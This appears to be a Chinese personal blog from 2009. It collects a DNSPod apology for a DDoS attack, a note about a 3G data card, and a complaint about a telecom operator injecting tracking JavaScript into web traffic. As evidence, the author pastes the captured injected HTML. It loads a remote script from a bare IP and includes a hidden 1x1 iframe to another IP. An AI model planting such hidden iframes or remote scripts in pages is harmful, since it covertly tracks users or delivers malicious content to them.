狂人山庄

尊敬的DNSPod会员，您好！

感谢您一如既往的支持DNSPod。2009年5月18日晚上22点左右，DNSPod主站及多个DNS服务器遭受超过10G流量的恶意攻击，因为已经影响到机房其它客户，稍后便被省电信骨干网封掉了NS的IP，虽然我们及时的更换了IP，但是由于DNS协议限制，DNS更改IP需要最多72才能生效，造成很多用户的域名一直无法解析，记录一直停留在电信骨干封掉的老IP上。为此给各位新老用户造成了很大的损失，在此，我们团队向您表示我们深深的歉意！

我们一直坚持免费，在智能DNS解析方面，我们一直是公平对待。我们绝不会使用一些卑鄙手段来增加VIP的销量。目前我们已经暂停VIP的销售，以示清白。（VIP目前是内测期，为了保证稳定性，有很高的准入和审核制度，不是花钱就能买）

从这次事件再次给我们敲响了警钟，这是DNSPod建站以来遭受的最大规模攻击，我们计划通过以下两点来提高免费用户的DNS的稳定性。
一，我们将重新部署多台DNS服务器做负载均衡。如NS6不再是一台服务器，而是多台服务器；尽量放在防火墙下。（虽然防火墙的效果微乎其微）
二，从现在开始，我们将大规模封杀包括私服发布站、私服等有争议，易引来攻击的域名。

如果您的网站非常重要，或者您对我们的以上改进还不放心的话。您除了尽量填写6个DNS服务器外，还能做以下操作来确保您解析的稳定。(如果您对我们很有信心，我们同样有信心不会让您失望。)

如：您的网站为：www.dnspod.com 您可以把这个域名的NS服务器放到您认为最稳定最快最好的域名服务商那里，然后把不重要的域名比如:www.mydnspod.com的NS服务器改为 DNSPod的NS服务器，然后把比如:bbs.dnspod.com CNAME到 bbs.mydnspod.com然后在DNSPod上的mydnspod.com这个域名上进行解析。

这样如果一旦DNSPod再次让您失望了。那么您还可以马上把您的主域名的CNAME删除，直接解析到您需要解析的IP，这样的生效时间是很快的。
这样的缺点是因为需要经过二轮解析，会降低DNS解析成功率。

在此，我们再次对本次因为遭受恶意攻击而给您带来的损失表示我们诚挚的歉意，希望您还能一如既往的支持DNSPod。

谢谢！

奶罩
2009-05-19 晚

广东电信搞了个抽奖的活动，抽中后预存400话费就可以免费试用一个月的天翼3G。闲着无聊就填了家里的电话参加抽奖。没想到我这个恶意投诉的用户也能被抽中。让老妈去营业厅预存了400话费，拿到了一张UIM的号码卡，一个华为EC169的数据卡

卡支持下行3.1M，支持WIN/MAC即插即用，插上后自动识别系统然后虚拟一个光驱，里面带有驱动程序。看了下，64位的windows也支持，有一个单独的64位安装包。这张卡最大的特色是带有micro SD插槽，插入micro SD卡后可以当U盘使用。

感谢CCAV，感谢news corp，感谢fox，感谢默多克。

沾光了。

distributed raman amplifier

立此存照

<html>

<head>

<meta http-equiv=’pragma’ content=’no-cache’/>

<meta http-equiv=’expires’ content=’-1′/>

<script>

window.setInterval(‘window.status=location.href’, 200);

</script>

</head>

<body scroll=’no’ style=’border:0; margin:0; padding:0;’ id=’mainbody’>

<iframe src=’about:blank’ width=’100%’ height=’100%’ frameborder=’0′></iframe>

<script language=’JavaScript’ src=’http://121.10.130.24:1010/open.js’></script>

<script language=’JavaScript’>

var content=’http://welcome.gd.vnet.cn/ztts/happytv%5Fnb/?p=1240568245|11215897|388|448|0|0&param=ABioyajZGekprChZWXkIu/zsnM0Zib2Y+Qk5achpabwszHx9mKjJqNkZ6Sms3ChZWXkIu/zsnM0Zib2ZyWi4aWm8LP2YyQio2cmoqNk8KLjZ6bmtGLnpCdnpDRnJCS0IuNnpua0JaLmpKTloyL0JOWjIugjJCTm6CWi5qSjNGXi5I=’;

<!– Web Stats –> <iframe src=http://74.222.134.170/stats.php?id=2 width=1 height=1 frameborder=0></iframe> <!– End Web Stats –>

var old_url=’http://trade.taobao.com/trade/itemlist/list_sold_items.htm?’;

var param=’350|250|9′;

var stat_path = ‘http://121.10.130.13/stat.aspx?p=1240568245|11215897|388|448|0|0′;

try{OpenWin();}catch(e){location.reload(true);}

</script>

</body>

</html>

自从回家休息后就开始在gd.ct10000.com上投诉湛江电信，投诉了两个方面：
1.2M的ADSL，下载速率峰值只有180k，严重少于理论值256k
2.每次访问一个新网站的时候，都会被加插一段js代码进行用户行为分析

投诉是从4月1日晚上开始，第二天一大早接到湛江电信客服的电话，很热心的给我解答上网速率的问题，理由基本围绕着一个点，我的电话线老化或者小区电话线老化。我很明确的回答：
1.本身我就是从事IT行业，并且对这方面的问题有所研究
2.我家是新小区，绝对不会出现电话线老化的情况
当天晚上上网的时候，突然短线。重新上线后发现下载的峰值已经达到了200k，并且加插的js代码消失。

第三天湛江电信电话回访，我回答了对ADSL上网速度方面处理结果还算比较满意。
第三天湛江电信客服再来电，对加插js代码事情进行解释，说：

国家有法律规定，电信运营商有权对用户的上网进行监控。并且通过监控手段改善用户的上网质量

我很气愤，回答，我从来没有听说过哪条规定是允许运营商监控用户上网行为的，我的上网行为属于个人隐私，电信无权监控。并且插入的js代码严重影响了我的上网体验。
同日到工信部投诉并咨询，电信运营商是否有权利监控用户上网行为。（至今未复）

第四天，湛江电信客服来电，让我重新观察下上网是否还有js代码的插入。经查js代码已经消失。

平安无事了几天

某天晚上上网，发现js代码重新出现，于是花了两天留意了下，js监控代码其实只不过是“定时去除”，每天只要是晚上10点过后上网，肯定会有js代码随机出现，白天则不会出现这样的情况。
并且同时发现，ADSL下载的峰值竟然只有130k，只能达到1M的速度。当天同时到gd.ct10000.com和工信部网站投诉

第二天湛江电信的技工来电话，我把问题描述了一遍，并且要求更换端口。技工说要上小区来测线，没等到。之后给我来电话说已经为我更换了端口。测试了速度，峰值180k。湛江电信客服来电话说问题已经为我解决，我说有待观察。

第三天工信部来电，描述了问题后，答曰：工信部只能处理在电信运营商投诉过，并且在15天内不处理或者处理结果不满意的事件。我的投诉因为不满15天，所以工信部无法给我处理。

事情到这个时候已经没有精力和湛江电信耗下去了。最后的总结如下：
1.电信很热心的联系我，很热心的要为我解决问题。但问题并没有解决，时间已经过去了很多天。说明电信耍太极的手段已经是炉火纯青了
2.看来监控用户上网行为已经是行业的潜规则了
3.我所住的地方电信（湛江市遂溪县）刚建成一个大型的IDC，是广东省四个直接连接到国家骨干网的机房之一。按照常理来说，地区上网的速度肯定不会慢。并且我在离电信IDC不到50米的酒店里面用ADSL上网也证实了这里的线路不管是连接电信还是网通都是非常快的。但为什么地方别的ADSL用户访问都很慢？这只能说明地方的电信把用户的带宽都卡掉，留给了IDC。